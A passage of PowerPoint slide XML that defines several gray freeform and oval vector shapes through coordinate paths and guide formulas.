                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56370" name="Freeform 1099"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4473" y="1991"/>
                <a:ext cx="122" cy="117"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 82 w 122"/>
                  <a:gd name="T1" fmla="*/ 9 h 117"/>
                  <a:gd name="T2" fmla="*/ 58 w 122"/>
                  <a:gd name="T3" fmla="*/ 0 h 117"/>
                  <a:gd name="T4" fmla="*/ 34 w 122"/>
                  <a:gd name="T5" fmla="*/ 3 h 117"/>
                  <a:gd name="T6" fmla="*/ 14 w 122"/>
                  <a:gd name="T7" fmla="*/ 12 h 117"/>
                  <a:gd name="T8" fmla="*/ 2 w 122"/>
                  <a:gd name="T9" fmla="*/ 28 h 117"/>
                  <a:gd name="T10" fmla="*/ 0 w 122"/>
                  <a:gd name="T11" fmla="*/ 39 h 117"/>
                  <a:gd name="T12" fmla="*/ 0 w 122"/>
                  <a:gd name="T13" fmla="*/ 50 h 117"/>
                  <a:gd name="T14" fmla="*/ 7 w 122"/>
                  <a:gd name="T15" fmla="*/ 73 h 117"/>
                  <a:gd name="T16" fmla="*/ 19 w 122"/>
                  <a:gd name="T17" fmla="*/ 92 h 117"/>
                  <a:gd name="T18" fmla="*/ 41 w 122"/>
                  <a:gd name="T19" fmla="*/ 109 h 117"/>
                  <a:gd name="T20" fmla="*/ 65 w 122"/>
                  <a:gd name="T21" fmla="*/ 117 h 117"/>
                  <a:gd name="T22" fmla="*/ 89 w 122"/>
                  <a:gd name="T23" fmla="*/ 117 h 117"/>
                  <a:gd name="T24" fmla="*/ 108 w 122"/>
                  <a:gd name="T25" fmla="*/ 106 h 117"/>
                  <a:gd name="T26" fmla="*/ 120 w 122"/>
                  <a:gd name="T27" fmla="*/ 89 h 117"/>
                  <a:gd name="T28" fmla="*/ 122 w 122"/>
                  <a:gd name="T29" fmla="*/ 78 h 117"/>
                  <a:gd name="T30" fmla="*/ 122 w 122"/>
                  <a:gd name="T31" fmla="*/ 67 h 117"/>
                  <a:gd name="T32" fmla="*/ 115 w 122"/>
                  <a:gd name="T33" fmla="*/ 45 h 117"/>
                  <a:gd name="T34" fmla="*/ 103 w 122"/>
                  <a:gd name="T35" fmla="*/ 25 h 117"/>
                  <a:gd name="T36" fmla="*/ 82 w 122"/>
                  <a:gd name="T37" fmla="*/ 9 h 1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17"/>
                  <a:gd name="T59" fmla="*/ 122 w 122"/>
                  <a:gd name="T60" fmla="*/ 117 h 1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17">
                    <a:moveTo>
                      <a:pt x="82" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="9"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56371" name="Freeform 1100"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4432" y="2100"/>
                <a:ext cx="149" cy="147"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 149"/>
                  <a:gd name="T1" fmla="*/ 11 h 147"/>
                  <a:gd name="T2" fmla="*/ 24 w 149"/>
                  <a:gd name="T3" fmla="*/ 30 h 147"/>
                  <a:gd name="T4" fmla="*/ 15 w 149"/>
                  <a:gd name="T5" fmla="*/ 44 h 147"/>
                  <a:gd name="T6" fmla="*/ 7 w 149"/>
                  <a:gd name="T7" fmla="*/ 58 h 147"/>
                  <a:gd name="T8" fmla="*/ 3 w 149"/>
                  <a:gd name="T9" fmla="*/ 72 h 147"/>
                  <a:gd name="T10" fmla="*/ 0 w 149"/>
                  <a:gd name="T11" fmla="*/ 86 h 147"/>
                  <a:gd name="T12" fmla="*/ 0 w 149"/>
                  <a:gd name="T13" fmla="*/ 100 h 147"/>
                  <a:gd name="T14" fmla="*/ 5 w 149"/>
                  <a:gd name="T15" fmla="*/ 114 h 147"/>
                  <a:gd name="T16" fmla="*/ 12 w 149"/>
                  <a:gd name="T17" fmla="*/ 125 h 147"/>
                  <a:gd name="T18" fmla="*/ 22 w 149"/>
                  <a:gd name="T19" fmla="*/ 133 h 147"/>
                  <a:gd name="T20" fmla="*/ 43 w 149"/>
                  <a:gd name="T21" fmla="*/ 147 h 147"/>
                  <a:gd name="T22" fmla="*/ 58 w 149"/>
                  <a:gd name="T23" fmla="*/ 147 h 147"/>
                  <a:gd name="T24" fmla="*/ 72 w 149"/>
                  <a:gd name="T25" fmla="*/ 147 h 147"/>
                  <a:gd name="T26" fmla="*/ 87 w 149"/>
                  <a:gd name="T27" fmla="*/ 141 h 147"/>
                  <a:gd name="T28" fmla="*/ 101 w 149"/>
                  <a:gd name="T29" fmla="*/ 136 h 147"/>
                  <a:gd name="T30" fmla="*/ 125 w 149"/>
                  <a:gd name="T31" fmla="*/ 116 h 147"/>
                  <a:gd name="T32" fmla="*/ 135 w 149"/>
                  <a:gd name="T33" fmla="*/ 103 h 147"/>
                  <a:gd name="T34" fmla="*/ 142 w 149"/>
                  <a:gd name="T35" fmla="*/ 89 h 147"/>
                  <a:gd name="T36" fmla="*/ 147 w 149"/>
                  <a:gd name="T37" fmla="*/ 75 h 147"/>
                  <a:gd name="T38" fmla="*/ 149 w 149"/>
                  <a:gd name="T39" fmla="*/ 61 h 147"/>
                  <a:gd name="T40" fmla="*/ 149 w 149"/>
                  <a:gd name="T41" fmla="*/ 47 h 147"/>
                  <a:gd name="T42" fmla="*/ 144 w 149"/>
                  <a:gd name="T43" fmla="*/ 33 h 147"/>
                  <a:gd name="T44" fmla="*/ 137 w 149"/>
                  <a:gd name="T45" fmla="*/ 22 h 147"/>
                  <a:gd name="T46" fmla="*/ 130 w 149"/>
                  <a:gd name="T47" fmla="*/ 14 h 147"/>
                  <a:gd name="T48" fmla="*/ 106 w 149"/>
                  <a:gd name="T49" fmla="*/ 3 h 147"/>
                  <a:gd name="T50" fmla="*/ 91 w 149"/>
                  <a:gd name="T51" fmla="*/ 0 h 147"/>
                  <a:gd name="T52" fmla="*/ 77 w 149"/>
                  <a:gd name="T53" fmla="*/ 0 h 147"/>
                  <a:gd name="T54" fmla="*/ 63 w 149"/>
                  <a:gd name="T55" fmla="*/ 5 h 147"/>
                  <a:gd name="T56" fmla="*/ 48 w 149"/>
                  <a:gd name="T57" fmla="*/ 11 h 1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9"/>
                  <a:gd name="T88" fmla="*/ 0 h 147"/>
                  <a:gd name="T89" fmla="*/ 149 w 149"/>
                  <a:gd name="T90" fmla="*/ 147 h 14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9" h="147">
                    <a:moveTo>
                      <a:pt x="48" y="11"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="11"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56372" name="Oval 1101"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4241" y="2119"/>
                <a:ext cx="248" cy="172"/>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73" name="Freeform 1102"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4137" y="2114"/>
                <a:ext cx="139" cy="119"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 84 w 139"/>
                  <a:gd name="T1" fmla="*/ 5 h 119"/>
                  <a:gd name="T2" fmla="*/ 58 w 139"/>
                  <a:gd name="T3" fmla="*/ 0 h 119"/>
                  <a:gd name="T4" fmla="*/ 34 w 139"/>
                  <a:gd name="T5" fmla="*/ 5 h 119"/>
                  <a:gd name="T6" fmla="*/ 14 w 139"/>
                  <a:gd name="T7" fmla="*/ 16 h 119"/>
                  <a:gd name="T8" fmla="*/ 7 w 139"/>
                  <a:gd name="T9" fmla="*/ 25 h 119"/>
                  <a:gd name="T10" fmla="*/ 2 w 139"/>
                  <a:gd name="T11" fmla="*/ 36 h 119"/>
                  <a:gd name="T12" fmla="*/ 0 w 139"/>
                  <a:gd name="T13" fmla="*/ 47 h 119"/>
                  <a:gd name="T14" fmla="*/ 2 w 139"/>
                  <a:gd name="T15" fmla="*/ 58 h 119"/>
                  <a:gd name="T16" fmla="*/ 5 w 139"/>
                  <a:gd name="T17" fmla="*/ 69 h 119"/>
                  <a:gd name="T18" fmla="*/ 12 w 139"/>
                  <a:gd name="T19" fmla="*/ 80 h 119"/>
                  <a:gd name="T20" fmla="*/ 29 w 139"/>
                  <a:gd name="T21" fmla="*/ 100 h 119"/>
                  <a:gd name="T22" fmla="*/ 55 w 139"/>
                  <a:gd name="T23" fmla="*/ 114 h 119"/>
                  <a:gd name="T24" fmla="*/ 82 w 139"/>
                  <a:gd name="T25" fmla="*/ 119 h 119"/>
                  <a:gd name="T26" fmla="*/ 108 w 139"/>
                  <a:gd name="T27" fmla="*/ 116 h 119"/>
                  <a:gd name="T28" fmla="*/ 127 w 139"/>
                  <a:gd name="T29" fmla="*/ 105 h 119"/>
                  <a:gd name="T30" fmla="*/ 132 w 139"/>
                  <a:gd name="T31" fmla="*/ 97 h 119"/>
                  <a:gd name="T32" fmla="*/ 137 w 139"/>
                  <a:gd name="T33" fmla="*/ 86 h 119"/>
                  <a:gd name="T34" fmla="*/ 139 w 139"/>
                  <a:gd name="T35" fmla="*/ 75 h 119"/>
                  <a:gd name="T36" fmla="*/ 139 w 139"/>
                  <a:gd name="T37" fmla="*/ 64 h 119"/>
                  <a:gd name="T38" fmla="*/ 134 w 139"/>
                  <a:gd name="T39" fmla="*/ 50 h 119"/>
                  <a:gd name="T40" fmla="*/ 130 w 139"/>
                  <a:gd name="T41" fmla="*/ 39 h 119"/>
                  <a:gd name="T42" fmla="*/ 110 w 139"/>
                  <a:gd name="T43" fmla="*/ 19 h 119"/>
                  <a:gd name="T44" fmla="*/ 84 w 139"/>
                  <a:gd name="T45" fmla="*/ 5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9"/>
                  <a:gd name="T70" fmla="*/ 0 h 119"/>
                  <a:gd name="T71" fmla="*/ 139 w 139"/>
                  <a:gd name="T72" fmla="*/ 119 h 1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9" h="119">
                    <a:moveTo>
                      <a:pt x="84" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56374" name="Oval 1103"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4099" y="2031"/>
                <a:ext cx="112" cy="110"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>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75" name="Freeform 1104"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4120" y="1927"/>
                <a:ext cx="147" cy="137"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 147"/>
                  <a:gd name="T1" fmla="*/ 20 h 137"/>
                  <a:gd name="T2" fmla="*/ 24 w 147"/>
                  <a:gd name="T3" fmla="*/ 42 h 137"/>
                  <a:gd name="T4" fmla="*/ 7 w 147"/>
                  <a:gd name="T5" fmla="*/ 67 h 137"/>
                  <a:gd name="T6" fmla="*/ 3 w 147"/>
                  <a:gd name="T7" fmla="*/ 81 h 137"/>
                  <a:gd name="T8" fmla="*/ 0 w 147"/>
                  <a:gd name="T9" fmla="*/ 92 h 137"/>
                  <a:gd name="T10" fmla="*/ 3 w 147"/>
                  <a:gd name="T11" fmla="*/ 103 h 137"/>
                  <a:gd name="T12" fmla="*/ 5 w 147"/>
                  <a:gd name="T13" fmla="*/ 114 h 137"/>
                  <a:gd name="T14" fmla="*/ 12 w 147"/>
                  <a:gd name="T15" fmla="*/ 123 h 137"/>
                  <a:gd name="T16" fmla="*/ 22 w 147"/>
                  <a:gd name="T17" fmla="*/ 131 h 137"/>
                  <a:gd name="T18" fmla="*/ 43 w 147"/>
                  <a:gd name="T19" fmla="*/ 137 h 137"/>
                  <a:gd name="T20" fmla="*/ 70 w 147"/>
                  <a:gd name="T21" fmla="*/ 131 h 137"/>
                  <a:gd name="T22" fmla="*/ 99 w 147"/>
                  <a:gd name="T23" fmla="*/ 117 h 137"/>
                  <a:gd name="T24" fmla="*/ 123 w 147"/>
                  <a:gd name="T25" fmla="*/ 95 h 137"/>
                  <a:gd name="T26" fmla="*/ 132 w 147"/>
                  <a:gd name="T27" fmla="*/ 84 h 137"/>
                  <a:gd name="T28" fmla="*/ 139 w 147"/>
                  <a:gd name="T29" fmla="*/ 70 h 137"/>
                  <a:gd name="T30" fmla="*/ 144 w 147"/>
                  <a:gd name="T31" fmla="*/ 56 h 137"/>
                  <a:gd name="T32" fmla="*/ 147 w 147"/>
                  <a:gd name="T33" fmla="*/ 45 h 137"/>
                  <a:gd name="T34" fmla="*/ 147 w 147"/>
                  <a:gd name="T35" fmla="*/ 34 h 137"/>
                  <a:gd name="T36" fmla="*/ 142 w 147"/>
                  <a:gd name="T37" fmla="*/ 23 h 137"/>
                  <a:gd name="T38" fmla="*/ 135 w 147"/>
                  <a:gd name="T39" fmla="*/ 14 h 137"/>
                  <a:gd name="T40" fmla="*/ 127 w 147"/>
                  <a:gd name="T41" fmla="*/ 6 h 137"/>
                  <a:gd name="T42" fmla="*/ 103 w 147"/>
                  <a:gd name="T43" fmla="*/ 0 h 137"/>
                  <a:gd name="T44" fmla="*/ 77 w 147"/>
                  <a:gd name="T45" fmla="*/ 6 h 137"/>
                  <a:gd name="T46" fmla="*/ 48 w 147"/>
                  <a:gd name="T47" fmla="*/ 20 h 1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7"/>
                  <a:gd name="T73" fmla="*/ 0 h 137"/>
                  <a:gd name="T74" fmla="*/ 147 w 147"/>
                  <a:gd name="T75" fmla="*/ 137 h 1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7" h="137">
                    <a:moveTo>
                      <a:pt x="48" y="20"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="20"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56376" name="Freeform 1105"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4151" y="1930"/>
                <a:ext cx="392" cy="298"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 58 w 392"/>
                  <a:gd name="T1" fmla="*/ 61 h 298"/>
                  <a:gd name="T2" fmla="*/ 77 w 392"/>
                  <a:gd name="T3" fmla="*/ 59 h 298"/>
                  <a:gd name="T4" fmla="*/ 96 w 392"/>
                  <a:gd name="T5" fmla="*/ 53 h 298"/>
                  <a:gd name="T6" fmla="*/ 113 w 392"/>
                  <a:gd name="T7" fmla="*/ 50 h 298"/>
                  <a:gd name="T8" fmla="*/ 125 w 392"/>
                  <a:gd name="T9" fmla="*/ 36 h 298"/>
                  <a:gd name="T10" fmla="*/ 108 w 392"/>
                  <a:gd name="T11" fmla="*/ 31 h 298"/>
                  <a:gd name="T12" fmla="*/ 92 w 392"/>
                  <a:gd name="T13" fmla="*/ 36 h 298"/>
                  <a:gd name="T14" fmla="*/ 82 w 392"/>
                  <a:gd name="T15" fmla="*/ 36 h 298"/>
                  <a:gd name="T16" fmla="*/ 99 w 392"/>
                  <a:gd name="T17" fmla="*/ 20 h 298"/>
                  <a:gd name="T18" fmla="*/ 120 w 392"/>
                  <a:gd name="T19" fmla="*/ 11 h 298"/>
                  <a:gd name="T20" fmla="*/ 137 w 392"/>
                  <a:gd name="T21" fmla="*/ 9 h 298"/>
                  <a:gd name="T22" fmla="*/ 154 w 392"/>
                  <a:gd name="T23" fmla="*/ 6 h 298"/>
                  <a:gd name="T24" fmla="*/ 171 w 392"/>
                  <a:gd name="T25" fmla="*/ 0 h 298"/>
                  <a:gd name="T26" fmla="*/ 188 w 392"/>
                  <a:gd name="T27" fmla="*/ 0 h 298"/>
                  <a:gd name="T28" fmla="*/ 207 w 392"/>
                  <a:gd name="T29" fmla="*/ 0 h 298"/>
                  <a:gd name="T30" fmla="*/ 245 w 392"/>
                  <a:gd name="T31" fmla="*/ 0 h 298"/>
                  <a:gd name="T32" fmla="*/ 269 w 392"/>
                  <a:gd name="T33" fmla="*/ 0 h 298"/>
                  <a:gd name="T34" fmla="*/ 288 w 392"/>
                  <a:gd name="T35" fmla="*/ 11 h 298"/>
                  <a:gd name="T36" fmla="*/ 303 w 392"/>
                  <a:gd name="T37" fmla="*/ 28 h 298"/>
                  <a:gd name="T38" fmla="*/ 322 w 392"/>
                  <a:gd name="T39" fmla="*/ 39 h 298"/>
                  <a:gd name="T40" fmla="*/ 339 w 392"/>
                  <a:gd name="T41" fmla="*/ 42 h 298"/>
                  <a:gd name="T42" fmla="*/ 356 w 392"/>
                  <a:gd name="T43" fmla="*/ 59 h 298"/>
                  <a:gd name="T44" fmla="*/ 370 w 392"/>
                  <a:gd name="T45" fmla="*/ 73 h 298"/>
                  <a:gd name="T46" fmla="*/ 380 w 392"/>
                  <a:gd name="T47" fmla="*/ 95 h 298"/>
                  <a:gd name="T48" fmla="*/ 384 w 392"/>
                  <a:gd name="T49" fmla="*/ 120 h 298"/>
                  <a:gd name="T50" fmla="*/ 387 w 392"/>
                  <a:gd name="T51" fmla="*/ 145 h 298"/>
                  <a:gd name="T52" fmla="*/ 387 w 392"/>
                  <a:gd name="T53" fmla="*/ 167 h 298"/>
                  <a:gd name="T54" fmla="*/ 387 w 392"/>
                  <a:gd name="T55" fmla="*/ 189 h 298"/>
                  <a:gd name="T56" fmla="*/ 392 w 392"/>
                  <a:gd name="T57" fmla="*/ 211 h 298"/>
                  <a:gd name="T58" fmla="*/ 392 w 392"/>
                  <a:gd name="T59" fmla="*/ 234 h 298"/>
                  <a:gd name="T60" fmla="*/ 380 w 392"/>
                  <a:gd name="T61" fmla="*/ 256 h 298"/>
                  <a:gd name="T62" fmla="*/ 360 w 392"/>
                  <a:gd name="T63" fmla="*/ 267 h 298"/>
                  <a:gd name="T64" fmla="*/ 344 w 392"/>
                  <a:gd name="T65" fmla="*/ 278 h 298"/>
                  <a:gd name="T66" fmla="*/ 327 w 392"/>
                  <a:gd name="T67" fmla="*/ 289 h 298"/>
                  <a:gd name="T68" fmla="*/ 310 w 392"/>
                  <a:gd name="T69" fmla="*/ 295 h 298"/>
                  <a:gd name="T70" fmla="*/ 286 w 392"/>
                  <a:gd name="T71" fmla="*/ 298 h 298"/>
                  <a:gd name="T72" fmla="*/ 267 w 392"/>
                  <a:gd name="T73" fmla="*/ 298 h 298"/>
                  <a:gd name="T74" fmla="*/ 250 w 392"/>
                  <a:gd name="T75" fmla="*/ 298 h 298"/>
                  <a:gd name="T76" fmla="*/ 231 w 392"/>
                  <a:gd name="T77" fmla="*/ 298 h 298"/>
                  <a:gd name="T78" fmla="*/ 214 w 392"/>
                  <a:gd name="T79" fmla="*/ 298 h 298"/>
                  <a:gd name="T80" fmla="*/ 197 w 392"/>
                  <a:gd name="T81" fmla="*/ 298 h 298"/>
                  <a:gd name="T82" fmla="*/ 180 w 392"/>
                  <a:gd name="T83" fmla="*/ 298 h 298"/>
                  <a:gd name="T84" fmla="*/ 164 w 392"/>
                  <a:gd name="T85" fmla="*/ 298 h 298"/>
                  <a:gd name="T86" fmla="*/ 142 w 392"/>
                  <a:gd name="T87" fmla="*/ 298 h 298"/>
                  <a:gd name="T88" fmla="*/ 125 w 392"/>
                  <a:gd name="T89" fmla="*/ 298 h 298"/>
                  <a:gd name="T90" fmla="*/ 108 w 392"/>
                  <a:gd name="T91" fmla="*/ 298 h 298"/>
                  <a:gd name="T92" fmla="*/ 92 w 392"/>
                  <a:gd name="T93" fmla="*/ 286 h 298"/>
                  <a:gd name="T94" fmla="*/ 75 w 392"/>
                  <a:gd name="T95" fmla="*/ 278 h 298"/>
                  <a:gd name="T96" fmla="*/ 58 w 392"/>
